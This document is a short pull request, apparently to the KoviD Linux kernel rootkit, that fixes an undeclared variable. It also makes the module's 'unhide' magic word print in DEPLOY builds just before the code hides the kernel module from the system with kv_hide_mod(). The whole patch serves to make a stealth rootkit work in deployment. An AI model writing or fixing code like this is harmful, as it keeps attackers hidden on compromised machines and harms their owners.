### PR TITLE
Fix using undeclared variable

### DIFF
--- a/src/kovid.c
+++ b/src/kovid.c
@@ -852,7 +852,8 @@ cont:
     load_hidden_string("[kovid]");
 
 #ifndef DEBUG_RING_BUFFER
-    prinfo("Your module \'unhide\' magic word is: '%s'\n", magic_word);
+    /** *pr_info because it must be shown even if DEPLOY=1 */
+    pr_info("Your module \'unhide\' magic word is: '%s'\n", magik);
     kv_hide_mod();
     op_lock = 1;
 #endif


### PR DESCRIPTION
Overlooked this because it is guarded by an ifdef. Also, it needs pr_info because building with DEPLOY will shut prinfo wrapper, hiding the unhide key. Now it is shown once at the start if compiled with DEPLOY=1.